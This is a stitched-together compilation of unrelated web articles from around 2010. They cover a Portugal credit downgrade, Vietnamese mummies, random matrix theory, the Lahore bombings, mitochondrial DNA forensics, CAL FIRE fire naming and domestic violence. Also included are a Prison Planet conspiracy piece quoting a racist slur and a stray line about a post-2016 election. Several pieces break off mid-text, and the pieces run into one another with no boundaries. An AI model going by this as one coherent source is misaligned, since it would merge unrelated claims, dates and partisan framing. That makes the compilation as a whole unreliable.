[ CALEA is the wiretap bill that was passed in 1994 . ]
Will he take down the guide ?
Like hell he will !
This is not the first time that Cryptome has been pursued using the DMCA .
Last year it put up Yahoo's surveillance guide , which included a price list .
Yahoo shouted until it was even more purple in the face than it normally is , but to no avail : the guide is still online -- although , one assumes , the prices have gone up .
Via Geekosystem
Euro plunges on the news :
Full text from S&P :
Overview
Fiscal and economic structural weaknesses in our view leave the Republic of Portugal in a comparably weak position to address the significant deterioration in its public finances and expected lackluster economic growth prospects over the medium term .
We are lowering our long - term ratings on Portugal to ' A - ' from ' A + ' and the short - term ratings to ' A - 2 ' from ' A - 1 ' .
The negative outlook reflects our assessment of the risk of a further downgrade should fiscal consolidation fall short of expectations or should concerns over government liquidity mount .
Rating Action
On April 27 , 2010 , Standard & Poor 's Ratings Services lowered its long - term local and foreign currency sovereign issuer credit ratings on the Republic of Portugal to ' A - ' from ' A + ' .
At the same time the local and foreign currency
short - term ratings were lowered to ' A - 2 ' from ' A - 1 ' .
The outlook is negative .
The ' AAA ' transfer and convertibility assessment is unchanged .
Rationale
The two - notch downgrade reflects our view of the amplified fiscal risks Portugal faces .
Under our revised base case economic growth scenario , we expect the Portuguese government could struggle to stabilize its relatively high debt ratio over the outlook horizon until 2013 .
Portugal 's public finances in our view remain structurally weak , notwithstanding the government 's substantial public sector reforms of recent years .
We believe past dependence on now more scarce external financing as a source of economic growth , and weak external competitiveness add to the likely adverse growth dynamics in Portugal .
As a result , to reach its current targets we expect that the Portuguese government would need to implement fiscal consolidation over and above its current plans .
Portugal 's fiscal indicators , as well as its growth outlook , in our view compare unfavorably with the 'A '
median for sovereigns .
We have revised downward our growth scenario for Portugal and now expect economic activity to stagnate in 2010 , after a contraction of 2.7 % in 2009 .
In our opinion , the economy 's growth potential will likely remain subdued , constrained by weak international competitiveness , low productivity gains , stagnating investment growth , and falling domestic credit as the highly leveraged private sector reduces debt .
Domestic credit , at 172 % of GDP in 2009 , is comparatively high in Portugal compared with that of most other Eurozone members .
We also consider it likely that relatively rigid product and labor markets could impede growth prospects in Portugal , prolonging the adjustment in prices and wages we view as necessary to regain external competitiveness .
As a result , we expect real GDP growth to return to 1 % only by 2012 .
Moreover , in our opinion the increase in nominal GDP is likely to be restricted by our expectation of low average GDP deflator growth of 0.6 % over 2010 - 2013 .
This ,
in turn , is likely to lead in our opinion to higher deficits and debt ratios .
An increase in the structural general government deficit alongside a cyclical decline in economic output has in our view caused Portugal 's public finances to worsen significantly , reversing previous progress in fiscal consolidation
since 2005 .
The government deficit rose to 9.4 % of GDP in 2009 from 2.7 % in 2008 .
The government initially chose to implement only limited consolidation measures in 2010 , which is why we expect the deficit to remain high , at 8.5 % of GDP in 2010 .
However , we understand that the government is now considering accelerating some consolidation efforts to 2010 that were initially intended for 2011 .
Nevertheless , the overall consolidation effort remains unchanged .
The government has announced that it aims to cut the deficit to less than 3 % of GDP by 2013 .
We expect fiscal consolidation to progress at a slower pace than the government foresees , achieving a deficit of 4.1 % of GDP by 2013 .
This is because we believe that there is implementation risk with regard to the government 's announced program , particularly given that the minority government will need opposition support to pass necessary legislation .
Still , our base - case assumption remains that the government should be able to form ad hoc alliances to secure direct or indirect support for key legislation , as it did during the parliamentary vote on the convergence program on March 25 , 2010 .
We also regard the government 's growth assumptions as optimistic , in our view overstating the fiscal impact of cyclical recovery .
The government could , however , raise taxes , which are currently not part of the consolidation plan , should the decrease in deficits not be as swift as envisaged .
This option , which is not currently part of our base - case scenario for public finances , provides upside potential to our forecast numbers
In line with our expectation of high deficits and weak economic growth , we expect government debt to continue to rise rapidly , to 95 % of GDP by 2013 from 66 % in 2008 .
Portugal has one of the highest debt - rollover ratios in the Eurozone , at almost 18 % of GDP in 2010 .
Fiscal imbalances and high debt rollover in our opinion leave Portugal vulnerable to changes in investor sentiment .
The resulting interest rate shock or further shocks to economic growth could in our view lead to a significantly more pronounced increase in the government 's debt ratio .
We believe this could eventually increase the pressure for faster and more pronounced fiscal adjustment .
Outlook
The negative outlook on Portugal reflects our assessment of the potential for a further downgrade if deficits and debt levels exceed our current expectations and if consolidation measures are not fully implemented .
Meanwhile , sustained weak growth in nominal GDP could in our view also undermine the government 's efforts to improve the general government deficit and debt ratios .
Downward pressure on the ratings could also result from adverse interest rate shocks to government finances .
We could revise the outlook to stable should the government manage to achieve at least its baseline consolidation agenda and put the budget deficit on a credible and sustainable downward path , thereby establishing a clear perspective for stabilizing and eventually reversing the debt ratio .
Vietnamese mummies did not have their organs removed and their bodies were supple and fragrant when unearthed
Thanks to pine oil , King Le Du Tong 's body remained in rather good condition during the 46 years it was kept at the Hanoi - based National History Museum before being reburied earlier this year
She looked like a sick woman who was asleep .
The thing was she had been sleeping for several centuries , underground .
The body of Pham Thi Dang , second wife of Dang Dinh Tuong a high - ranking official under the Le Dynasty ( 1428 -1788 ) was found 42 years ago in Van Cat Hamlet , in the northern province of Nam Ha ( now Nam Dinh ) .
" We had excavated many mummies , but we could n't help being shocked when seeing her , because she looked as if she were just a sick woman who was sleeping , "  says Do Dinh Truat .
Decades after studying mummies discovered across the country from the bodies of royalty and senior officials to the common man , archeologists Do Van Ninh and Truat are still amazed by the ancient Vietnamese technique of preserving bodies .
Despite not having their internal organs and brains removed , as in Egyptian mummies , their bodies were usually found in good condition - soft with joints still supple after being buried for hundreds of years , they said .
Some still retained the facial features they had when they were alive , Truat said .
In the case of Dang , the veteran archeologist even asked a local woman who was at the same age as Dang , 60 years old , to stand next to the body " to see who was more beautiful . " 
Pine oil
According to the archeologists , one of the secrets in the Vietnamese techniques of preserving bodies was pine oil , which they say has been found in most mummies
Archeologist Do Dinh Truat with a clod of solid essential pine oil found in an old coffin
The late Prof .
Do Xuan Hop , known to many as the " King of Anatomy "  was one of the scientists who studied the body of King Le Du Tong ( 1679 - 1731 ) which was found in 1958 in the central province of Thanh Hoa .
Hop noted that the king was placed in a coffin that contained lots of pine oil .
The oil made quilted blankets , clothes and shrouds oily , while " the fragrance soaked into his skin and through skin into his internal organs , so [ he was ] soaked with aroma , "  Hop wrote , noting that betel leaves and areca buried with him also remained fresh .
Thanks to the oil , the Le Dynasty king 's body remained in rather good condition during the 46 years it was kept at the Hanoi - based National History Museum before being reburied earlier this year despite the harsh weather in the north , scientists said .
The importance of pine oil was stressed in another article by Hop .
He wrote that the body of a royal wife from the Trinh Lords ( 1545 - 1787 ) , found in 1957 , was only examined by scientists a month later .
During that month the body was taken out of the coffin and buried in the field for three days before being put into another coffin flooded with water ( though it is not clear why this was done ) .
However , it still gave out the pine oil 's aroma .
The body was later washed five times , yet the aroma did n't fade away , Hop wrote .
Truat also recalled his first impressions of the mummies he saw .
" Many people think mummies must stink , but amazingly , they give out the aroma of some wood . " 
The archeologist said he even once tasted the water at the bottom of a mummy 's coffin and found that it was n't fetid , but tasted like turpentine .
More than props
Besides the pine oil , other things like blankets , pillows and clothes which were considered customary belongings for placement in the coffins , worked in fact to get rid of the humidity in coffins , Ninh said .
This was also true of the tam that tinh ( Seven - star plank ) , which was usually placed under the body .
Under Taoism , the plank with seven holes placed in the shape of Ursa Major , or the Great Bear constellation , was believed to protect the deceased 's spirit from evil spirits and ghosts .
But it also helped drain water to the 20 - centimeter thick layer of roasted rice below , Ninh said
The roasted rice also acted to help remove humidity .
Ninh said dying people usually had some ruou que ( cinnamon wine ) to lengthen their life for some time to meet all of their children , and they would be washed with the wine again after their death .
The wine would help clean the body , within and outside , decreasing the harmful effects of bacteria , he surmised .
It was also a custom that Vietnamese people lit candles in the coffin before putting the body in , and this also helped create a vacuum and kill bacteria , according to Ninh .
Enduring wood
Truat said one of the most noticeable things about Vietnamese mummies was that they were mostly interred in coffins made of ngoc am ( or pemou wood ) which was highly resistant to termites and bacteria .
The coffins were made by highly skilled carpenters , airsealed and then plastered them with a mixture of raw paints , and sawdust with or without a sticky substance from pine trees mixed with rice paste .
Some coffins were made with two layers , with the outer coffins as thick as 0.5 meters , made with lime , sand , molasses or honey , and sometimes strengthened with shell crumbles ( not made of wood ) .
Some outer coffins were so strong that it took 15 young men 40 days to break it , like the one that Nguyen Thi Hieu , believed to be a family member of King Gia Long ( 1802 - 1820 ) under the Nguyen Dynasty , was buried in .
Her body , found 16 years ago , is being kept at the Ho Chi Minh City History Museum .
" At the Thuy Xuan Beach in the northern province of Thai Binh , an outer coffin was smoothened by waves over the years , yet locals did n't realize that ( it was an outer coffin ) until they accidentally excavated it and found the complete body of a young lady , "  Truat said , demonstrating that the body was not damaged even though the coffin was buried on the coast and exposed to factors like salt .
Dr. Phan Bao Khanh , who has studied many mummies in the central region , said the Vietnamese technique of preserving bodies was " a very human way to preserve bodies , as no knives or scissors were used to take out the deceased 's brains and internal organs . " 
A numbers game ( Image : Cey Adams / Corbis )
SUPPOSE we had a theory that could explain everything .
Not just atoms and quarks but aspects of our everyday lives too .
Sound impossible ?
Perhaps not .
It ’s all part of the recent explosion of work in an area of physics known as random matrix theory .
Originally developed more than 50 years ago to describe the energy levels of atomic nuclei , the theory is turning up in everything from inflation rates to the behaviour of solids .
So much so that many researchers believe that it points to some kind of deep pattern in nature that we do n’t yet understand .
“ It really does feel like the ideas of random matrix theory are somehow buried deep in the heart of nature , ” says electrical engineer Raj Nadakuditi of the University of Michigan , Ann Arbor .
All of this , oddly enough , emerged from an effort to turn physicists ’ ignorance into an advantage .
In 1956 , when we knew very little about the internal workings of large , complex atomic nuclei , such as uranium , the Hungarian physicist Eugene Wigner suggested simply guessing .
Quantum theory tells us that atomic nuclei have many discrete energy levels , like unevenly spaced rungs on a ladder .
To calculate the spacing between each of the rungs , you would need to know the myriad possible ways the nucleus can hop from one to another , and the probabilities for those events to happen .
Wigner did n’t know , so instead he picked numbers at random for the probabilities and arranged them in a square array called a matrix .
The matrix was a neat way to express the many connections between the different rungs .
It …
Will establishment media take the bait as anarchists pose as racists and extremist right wingers ?
Paul Joseph Watson
Prison Planet.com
Monday , April 12 , 2010
With the establishment desperate to engender and exploit violence which will be used to demonize the Tea Party movement as an extremist mob , so - called anarchists are now openly declaring their intentions to pose as Tea Party members and stage violence in order to discredit populist grass roots organizations .
As we warned last week , leading anarchist groups have announced that they plan to “ crash ” the nationwide Tea Party protests on April 15 , a promise that should not be taken lightly given the proven history of such organizations being infiltrated and steered by authorities to provocateur pointless mayhem and violence that serves as a justification for oppressing peaceful protest groups .
Now a new website called crashtheteaparty.org has appeared to act as a forum through which such activity can be planned .
The website openly states its mission is to have people infiltrate and pose as Tea Party members and then carry out shameful acts in order to “ dismantle and demolish ” the Tea Party .
The website is registered to a man named Josh Levin .
“ Whenever possible , we will act on behalf of the Tea Party in ways which exaggerate their least appealing qualities ( misspelled protest signs , wild claims in TV interviews , etc. ) to further distance them from mainstream America and damage the public ’s opinion of them .
We will also use the inside information that we have gained in order to disrupt and derail their plans , ” states the website .
“ In other words , some on the Left in American politics are running a KGB - like “ false flag ” operation to discredit the Tea Party , ” writes the Washington Examiner ’s Josh Tapscott .
“ They could n’t sell the transparently nonsensical idea that Tea Partiers are just a bunch of racists , homophobes and morons , so the Crash the Party agents on the Left are infiltrating the Tea Party in order to pose as a bunch of racists , homophobes and morons . ”
A d v e r t i s e m e n t
“ It ’s among the most illustrative expressions ever of the thirst on the Left to suppress dissent by whatever means are necessary , ” he adds .
Given the virulent hatred for free speech such groups embrace , it ’s unsurprising that merely staging a counter - demonstration is not good enough for them – they have to impersonate and undermine their political opposition in a completely underhanded and immature fashion .
( ARTICLE CONTINUES BELOW )
Despite the fact that the website preaches non-violence , several of the posts appear to be from anarchists posing as Tea Party members and threatening violence .
One such post entitled , “ Tea Party Members , Step Aside Or Be Violently Put Aside , ” written by “ The Invisible Tea Party , ” advocates violent overthrow of the government and plays precisely into the hands of the establishment ’s recent drive to characterize any opposition whatsoever to the federal government as potentially violent .
“ If the facade of the Tea Party Movement does not step aside … well … they will have to be forced aside at their rallies and on their websites and if they are forced … it will not be peaceful , ” states the post .
Respondents to the post call out the originator as an anarchist posing as a Tea Party member , advocating violence as a means of discrediting the Tea Party .
“ I think your full of crap Febbs , before the swarm of tea party patriots you were collaborating with the web - master “ The mad hatter , ” writes one .
Other anarchists posing as Tea Party members openly spout racism in an attempt to fulfil the need to portray the Tea Party movement as “ racists , homophobes and morons ” .
“ We need to bring some colored nigeros to the next tea party so we do n’t appear to be racists .
We have to bring some tame ones , not the wild street apes with gold teeth and saggy pants , ” writes one poster .
The rest of the forum appears to have been completely overrun by real Tea Party members who have taken delight in turning the whole thing into a farce by challenging the provocateurs to real debates , something which anarchists tend to shy away from when they ’re not pointlessly shattering windows at the local downtown McDonalds .
The Washington Examiner ’s Josh Tapscott labels the whole effort , “ Saul Alinsky on steroids ” .
As Tapscott rightly points out , the success of the “ crash the Tea Party ” scam will depend upon whether the mainstream media takes the bait , which is almost a certainty considering how the press wholesale manufactured the alleged Emmanuel Cleaver “ racist spitting ” farce , which as videos of the incident later proved , amounted to nothing more than an old man yelling .
“ It ’s a classic KGB - style disinformation campaign .
Will mainstream media editors and reporters be fooled ?
Will they know it when they are being scammed by Crash the Party ?
Will they expose Crash the Party operatives or cooperate with them in their effort to misrepresent millions of Americans ? ” concludes Tapscott .
This article was posted : Monday , April 12 , 2010 at 5:30 am
Print this page .
Infowars.com Videos :
Comment on this article
While I still have n’t had the time to restore the old posts in this blog , I would like to post again my seminar on makefiles .
This slideshow is different from all the others you can find on makefiles , because instead of showing you how to use it to compile programs , it shows you how make can be used to create pipelines of shell programs and scripts , which is very useful in bioinformatics and in other fields .
Let ’s say you have a lot of scripts to analyze the results of an experiment : for example , one to launch blast , another to parse its output , to compare it with other databases , to run command line programs … or just to organize a bundle of sed / grep / gawk scripts .
A makefile can be used to store complex commands like that and organize them in a pipeline : for example , the operation ‘ run_blast ’ consists in running blast and parsing its results ; and the ‘ analyze_results ’ consists in a series of sed and gawk scripts , along with an R one .
I have seen many people using shell scripts to do so , but the best approach is to use a language designed to describe pipelines : this is what Make is , one of the oldest ( yet used widely ) languages to define pipelines , so it is good to start learning with it .
Another difference with respect to other seminars on makefiles is that I have tried to start with a ‘ reduced makefile syntax ’ , in which you just use the name of the rule , the prerequisites , and the commands , without worrying that the name of the rule corresponding to the name of an output file .
If you prefer to know about the standard approach , I suggest to start with reading the corresponding section on software carpentry for bioinformatics .
" Security .
Cameras not allowed ! " was the response .
There was clearly no argument .
From battellemedia.com via clp.ly
Anyway , this is clearly a wonderful charlie horse .
The flight attendant just showed me the United policy manual which prohibits " two way devices " from communicating with the ground .
From battellemedia.com via clp.ly
United stopped John Battelle from having a video chat wither his wife and kids because he might be communicating with terrorists .
In face they said that any way of communicating with the ground was not allowed .
Ah , hello you put wifi on the plane people .
Are we supposed to only use it to communicate with people on other planes ?
Sometimes corporations can be incredibly stupid , this is one of those times .
More on John 's blog ...
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement
Two suicide bombers have killed at least 45 people in the Pakistani city of Lahore , officials say .
The attacks occurred within seconds of each other and targeted military vehicles as they passed through a crowded area .
At least nine soldiers were killed and some 100 people were wounded .
There have been several attacks on Lahore in the past year .
On Monday the Taliban destroyed a building used by intelligence services , killing 13 .
Friday 's explosions took place near the RA Bazaar , in a busy residential and shopping area where army and security agencies have facilities .
No group has said it carried out the bombings .
Late on Friday , a third blast was reported in Lahore .
' Smoke rising everywhere '
Officials said the blasts took place within 15 to 20 seconds of each other .
ANALYSIS By M Ilyas Khan , BBC News , Islamabad
These latest attacks are the first in this politically important city since December .
It is the capital of Pakistan 's most populous province - a barometer of its stability .
One possible reason for this sudden escalation could be the recent death of Qari Zafar , a top leader of the so - called Punjabi Taliban , in a US drone strike in the north - west .
But it may also be simply a waxing and waning of pressure by the militants to wear down the government 's resolve .
Lahore is the only provincial capital which is still considered relatively safe .
Other cities have borne the brunt of incessant militant attacks .
There are conflicting reports about whether the two bombers rode motorcycles or were on foot .
Police official Chaudhry Mohammad Shafiq said the severed heads of both attackers had been found .
Suicide bombers often strap explosives to their bodies and are decapitated when they detonate .
An eyewitness , Mohammad Nadeem , said he had been praying in a mosque when he heard the first blast and rushed out only to hear a second .
" The second blast took place very near a military vehicle , " Mr Nadeem , his clothes stained with blood , told AFP news agency .
" I sensed real danger and started running .
There were scenes of destruction in nearby restaurants and shops .
" There were broken chairs and tables and other items lying everywhere on the ground . "
Another eyewitness , Afzal Awan , said he had seen wounded people with limbs missing lying in pools of blood .
" I saw smoke rising everywhere , " he told reporters .
" A lot of people were crying . "
Taliban threat After Monday 's attack , the Pakistani Taliban promised to unleash up to 3,000 suicide bombers across the country unless Pakistan 's army stopped its operations against the militant group and US drone strikes ended .
ATTACKS ON LAHORE 12 March 2010 :
At least 45 die in twin bomb attacks on military vehicles 8 March 2010 : 13 killed in attack on security agency building 7 December 2009 : 48 killed in blast at a crowded market 15 October 2009 : 40 die in assaults on security forces 27 May 2009 : Car bomb attack on police buildings kills at least 23 30 March 2009 : Gunmen attack a police academy , killing eight 3 March 2009 : Six die in ambush on visiting Sri Lankan cricket team
In pictures : Lahore attacks Pakistan has been fighting insurgents in the volatile tribal areas bordering Afghanistan .
The military recently stepped up operations against the Taliban leadership , arresting the military commander of the Afghan Taliban , Mullah Abdul Ghani Baradar , who was hiding in the southern city of Karachi .
A number of other top figures in the Afghan Taliban are also reported to have been arrested across Pakistan over the last few weeks .
In the last six months , hundreds of civilians have been killed in militant attacks across the country .
The BBC's Aleem Maqbool in Islamabad says there are no signs the violence is coming to an end .
Last October simultaneous assaults on three security buildings across Lahore killed 38 people .
In December , two bomb blasts at a market in the city killed 48 and injured more than 100 .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Remote Terminal connection back to a PC running
Do n't look surprised .
With the Windows Phone 7
Series dev tools now out in the open the pent up demand for that elusive HD2 upgrade was bound to be a priority for some well - meaning developers , somewhere ... namely , Russia .
Now we 've got what looks to be the first screenies of the WP7S OS running on an HD2 .
Better yet , htcpedia claims that almost everything is working including WiFi , GPS , and Bluetooth .
However , the graphics driver is still showing problems and there is noticeable device lag .
Nevertheless , the team is planning a beta release soon .
Imagine it , an HD2 WP7S ROM available before Microsoft and its partners can even launch an official device , with its 5 buttons or not -- nowwould be something .
One more grab after the break , the rest at the source below . : Video evidence after the break .
For what it 's worth , the folks at XDA also think it 's legit . :
Yet another video has surfaced ... beta please . :
It 's worth noting , as demonstrated by our friends at the : unwired , that the so - called port could be easily faked with athe unlocked SDK .
So while the HD2 port is definitely coming , this might very well be a hoax .
[ Thanks to everyone who sent this in ]
Republicans have remained unusually silent on the tax , hoping to avoid a choice between supporting a tax increase and defending big bankers .
Meanwhile , some liberal Democrats have gone further than the administration has , proposing a heavy tax on bank bonuses .
Political analysts expect the bank tax to pass easily in the House but face resistance in the Senate .
There may be room for compromise .
Administration officials hope to keep the proposed tax limited to major financial institutions with more than $ 50 billion in assets but consider that a difficult line to draw .
For example , the proposed tax would not apply to large hedge funds ; the mortgage finance giants Fannie Mae and Freddie Mac ; or the carmakers Chrysler and General Motors .
“ We believe the lines we have drawn are sound and sensible , ” said Gene B. Sperling , a senior Treasury Department official .
“ We understand these are the type of things we will need to keep an open mind on in negotiations with Congress . ”
The financial lobby has insisted that it is unfair for banks to cover the cost of losses tied to nonbank bailout recipients like the automakers and the American International Group , the giant insurer that is now majority - owned by the government .
In an appearance on CNBC on Thursday , Representative Barney Frank , chairman of the House Financial Services Committee , called the argument over including the automakers legitimate .
At the lobbying group , the selection of Mr. Phillips of Sidley Austin raised eyebrows because it suggests that Wall Street may be spoiling for a fight .
Davis Polk & Wardwell , another white - shoe law firm , has been advising the same lobbying group on legal matters tied to new financial regulation .
Mr. Phillips , who was an appellate lawyer in the Justice Department during the Reagan administration , brought his first case in front of the Supreme Court when he was just 29 years old .
Since then , he has appeared before the court more than 60 times .
Mr. Phillips declined to comment about his work for the industry , referring all questions to the lobbying group .
The group has hired him before .
Last spring , it retained Mr. Phillips to examine similar legal questions after lawmakers prepared to heavily tax Wall Street bonuses in response to the public ’s outrage over bonuses for A.I.G. traders .
Through an extensive phone campaign and relentless lobbying on Capitol Hill , the financial lobby successfully beat back the legislation without using the courts .
A DNA - matching technique often used in forensics has been called to the stand .
Fine - grained analysis of DNA found in cell structures called mitochondria suggests that it can vary widely between tissues , making samples tricky to compare .
" I would n't say that it throws other results out the window , but it does throw a curve ball , " said Nickolas Papadopoulos , a Johns Hopkins University geneticist and co-author of the study , published March 4 in Nature .
Mitochondria are found by the hundreds in every human cell .
They convert glucose to energy , and possess their own tiny genomes , separate and distinct from the organismal genome found in each cell nucleus .
In the mid-1990s , law enforcement added mitochondrial DNA comparison to its forensic genetic toolkit .
Because there are so many mitochondria in each cell , readable copies of their genomes can often be found even when the nuclear genome has been damaged .
This is especially useful for old , highly degraded biological samples .
Mitochondrial DNA - matching is based on the assumption that it does n't vary much in an individual : Aside from a few inevitable mutations , mitochondrial DNA are generally supposed to be the same in , say , heart cells and hair cells .
But when Papadopoulos ' team applied the latest in gene - sequencing technology to mitochondrial genomes from nine tissue types in two people , that 's not what they found .
Instead , each person seemed to have a mixture of mitochondrial genotypes .
One DNA variant , for example , was found in about 7 percent of a person 's skeletal - muscle mitochondria , but 90 percent of their kidney mitochondria .
That spread was typical .
" It 's more than was thought , and was present in almost every tissue we looked at , " said Papadopoulos .
Further research into these variations is needed , but forensic specialists should be careful to compare the same types of tissue , he said .
Upon learning of the paper , John Planz , associate director of the DNA Identity Laboratory at the University of North Texas Health Science Center , cautioned that further studies are needed .
High levels of genetic variation between mitochondria that were found in previous studies turned out to be the result of errors in measurement and analysis , he said .
After reading it in depth , he called it " an outstanding piece of work , " and said that its methodology pointed to a new gold standard in analyzing genetic data .
" This study gets a double thumbs up from me , " he said .
Mitochondrial DNA analysis is also used in other types of research .
Evolutionary family trees are deduced from comparisons of mutations between fossil samples .
The same techniques are used to trace the historical flows of human populations .
Those studies involve group patterns and relatively large - scale changes over long periods of time .
So they may not be as challenged by the Nature findings as forensic applications are , which try to find perfect matches , said Papadopoulos .
" This requires more study , but it could put a damper on how things have been interpreted to this point , " he said .
Update 3/5/2010 :
The story originally contained John Planz ' general caveats about the findings ; it has since been updated with his strongly favorable view of the study 's details .
Image : Mitochondria in the brain tissue of a rat . / Indiana University - Purdue University Indianapolis
See Also :
Citation : " Heteroplasmic mitochondrial DNA mutations in normal and tumour cells . "
By Yiping He , Jian Wu , Devin C. Dressman , Christine Iacobuzio - Donahue , Sanford D. Markowitz , Victor E. Velculescu , Luis A. Diaz Jr , Kenneth W. Kinzler , Bert Vogelstein and Nickolas Papadopoulos .
Nature , Vol. 463 , No. 7285 , March 4 , 2010 .
Brandon Keim's Twitter stream and reportorial outtakes ; Wired Science on Twitter .
Brandon is currently working on a book about ecological tipping points .
How fires get their names
Fires are usually named for the area in which they start – a geographical location , local landmark , street , lake , mountain , peak , etc .
Quickly naming the fire provides responding fire resources with an additional locater , and allows fire officials to track and prioritize incidents by name .
For example during the Southern California Fire Siege of 2003 , the largest wildland fire in California history , the Cedar Fire in San Diego County , was named after the Cedar Creek Falls area where it started .
The destructive Old Fire , which burned during the same time period in San Bernardino County , was named after the road along which it started - Old Waterman Canyon Road .
CAL FIRE is the largest fire department in California and the second largest fire department in the United States .
CDF - CAL FIRE Firefighters answer the call more than 300,000 times a year .
CAL FIRE
Firefighters make up the fire department for 30 of our 58 counties in California and more than 100 local communities .
We serve as the incident command during many of California ’s most serious disasters .
CAL FIRE
Firefighters respond to many various types and forms of calls ranging from structural fires , to auto accidents , to earthquakes , to floods , to the spilling of hazardous materials , to every conceivable disaster ; CAL FIRE answer 's the calls .
CAL FIRE is the largest fire department in California and the second largest fire department in the United States .
CAL FIRE firefighters protect 33 million acres of State Responsibility Area ( SRA ) .
We have over 4,000 members within CAL FIRE and CAL FIRE is associated with the Every year in California thousands of wildfires start throughout the state .
In most cases , the dispatch center sending the initial resources to a wildland fire will designate a name for the fire , but the first on scene engine or fire official can also name the incident .
a geographical location , local landmark , street , lake , mountain , peak , etc .
Quickly naming the fire provides responding fire resources with an additional locater , and allows fire officials to track and prioritize incidents by name .
For example during the Southern California Fire Siege of 2003 , the largest wildland fire in California history , the Cedar Fire in San Diego County , was named after the Cedar Creek Falls area where it started .
The destructive Old Fire , which burned during the same time period in San Bernardino County , was named after the road along which it started - Old Waterman Canyon Road .
CDF - CAL FIRE
Firefighters answer the call more than 300,000 times a year .
CAL FIRE
Firefighters make up the fire department for 30 of our 58 counties in California and more than 100 local communities .
We serve as the incident command during many of California ’s most serious disasters .
CAL FIRE
Firefighters respond to many various types and forms of calls ranging from structural fires , to auto accidents , to earthquakes , to floods , to the spilling of hazardous materials , to every conceivable disaster ; CAL FIRE answer 's the calls .
CAL FIRE firefighters protect 33 million acres of State Responsibility Area ( SRA ) .
We have over 4,000 members within CAL FIRE and CAL FIRE is associated with the California Professional Firefighters CPF ) and the International Association of Firefighters IAFF ) .
Go Back To Top California Fire News - Focus on Wildland Fires throughout the state .
Real fire news when you need it .
CAL FIRE news , Fire & EMS Department News , ... Cal Fire
News is for casual public interest , and does * not* constitute an official warning system .
Those who choose to read or receive Cal Fire News messages do so with the understanding they are * not * an official instruction , suggestion or permission to take action .
CLICK HERE - BACK TO TOP OF CAL FIRE NEWS HOME PAGE
March is Women ’s History Month , recognizing women ’s central role in society .
Unfortunately , violence against women is epidemic in the United States and around the world .
Domestic violence is on the minds of many now , as reports published by The New York Times implicate New York Gov. David Paterson in an alleged attempt to influence a domestic violence case against one of his top aides .
The Times reports , based in part on unnamed sources , say that the Paterson aide , David W. Johnson , attacked his girlfriend on Halloween night , Oct. 31 , 2009 , “ choking her , smashing her into a mirrored dresser and preventing her from calling for help . ”
New York state police from the governor ’s personal protection detail contacted the victim , despite having no jurisdiction .
Then the governor himself intervened , the Times alleges , asking two aides to contact the victim and to arrange a phone call between him and the victim .
The call occurred on Feb. 7 of this year , the night before the victim was to appear in court to request an order of protection from Johnson .
She did not appear in court , and the case was dismissed .
After the exposé , the governor ended his bid for election and suspended Johnson without pay .
Denise O’Donnell , Paterson ’s deputy secretary for public safety and commissioner of the state ’s Division of Criminal Justice Services , resigned last week , saying , “ The behavior alleged here is the antithesis of what many of us have spent our entire careers working to build — a legal system that protects victims of domestic violence and brings offenders to justice . ”
The National Organization for Women , a longtime ally of Paterson , has called on him to resign .
The Paterson scandal follows that of New York state Sen. Hiram Monserrate , who was charged with assaulting a female companion with the jagged edge of a broken glass in December 2008 .
She later altered her story to conform to Monserrate ’s version of events , but the weakened criminal case proceeded against him , without her cooperation , and he was found guilty of misdemeanor assault .
He was expelled from the New York Senate last month .
These high - profile cases are sadly symptomatic of a massive problem .
The Family Violence Prevention Fund offers this chilling summary of domestic violence in the U.S. : 1 in 4 women report violence at the hands of a current or former spouse or boyfriend at some point in their lives ; three women per day are murdered by their husbands or boyfriends ; women suffer 2 million injuries from intimate - partner violence each year ; and there were 248,300 rapes / sexual assaults in 2007 , more than 500 per day , up from 190,600 in 2005 .
President Barack Obama has reaffirmed October as National Domestic Violence Awareness Month , and stressed the link between the economy and domestic violence : “ In the best of economic times , victims worry about finding a job and housing , and providing for their children ; these problems only intensify during periods of financial stress . ”
Sen . Harry Reid said about domestic abuse last week : “ It has gotten out of hand .
Why ?
Men do n’t have jobs .
Women do n’t have jobs either , but women are n’t abusive , most of the time .
Men , when they ’re out of work , tend to become abusive .
Our domestic crisis shelters in Nevada are jammed .
It ’s the way it is all over the country . ”
Given the severity of the problem of domestic violence , and its likely exacerbation by the economic crisis , it is hard to believe that so - called health insurance companies actually label a woman ’s victimization by domestic violence as a “ pre-existing condition . ”
The term has long been used by health insurance corporations to deny coverage to applicants or , perhaps worse , to retroactively deny coverage to people who suffered from a condition before they were insured .
At Obama ’s bipartisan health care summit last week , New York Rep. Louise Slaughter pointed out , “ Eight states in this country right now have declared that domestic violence is a pre-existing condition , on the grounds , I assume , that if you ’ve been unlucky enough to get yourself beaten up once , you might go round and do it again . ”
March 8 is recognized by the United Nations and many countries around the world ( but not the U.S. ) as International Women ’s Day .
March is Women ’s History Month .
Thousands of events are being held around the world to honor women .
Let ’s start here in the U.S. by making violence against women history .
Denis Moynihan contributed research to this column .
Amy Goodman is the host of “ Democracy Now ! , ” a daily international TV / radio news hour airing on more than 800 stations in North America .
She is the author of “ Breaking the Sound Barrier , ” recently released in paperback and now a New York Times best - seller .
© 2010 Amy Goodman
Distributed by King Features Syndicate
The way two panelists at a key immigration conference see it , the issue Donald Trump ran on in his successful 2016 campaign emerges in this year 's presidential contest much the same way it did before : as a battle between a group seeking to stop demographic changes and one embracing them .
Too Big to Fail =
Too big to exist .
it 's time to shatter the big four into divisions .
This is nothing new :
Standard oil for examplehttp://en.wikipedia.org/...
The U.S. Supreme Court ruled in 1911 that antitrust law required Standard Oil to be broken into smaller , independent companies .
Among the " baby Standards " that still exist are ExxonMobil and Chevron .
If not for that court ruling , Standard Oil would be worth more than $ 1 trillion today
When Corporations have purchasing power greater than nations , its time they were broken up , as their failure could bring down nations .
Iceland , Greece , and possibly Spain spring instantly to mind .
The rules that are meant vaingloriously to limit corporate power , ie competition can no longer be deemed to work .
If you believe in democracy and capitalism , then the role of government must be to ensure :
1 ] A level playing field
2 ] Adequate regulation .
3 ] Globally enforceable rules .
To have competition governments should be forbidden from bail - outs , and proposed mergers should be treated with greater inspection and regulation .
Anti -trust laws must be tightened up on a world wide level , until this is done then ' free trade ' will be anything but open and fair .
One group of mega - corporations nearly drove us into a Great Depression again by their unfair and dishonest practices .
Its time this danger was removed .
Limits to corporate size must be enforced to ensure fair competition for all , regulation and oversight must be on a global level as many nations cannot resist their power .
Even the US can be made to teeter and bend to their needs .
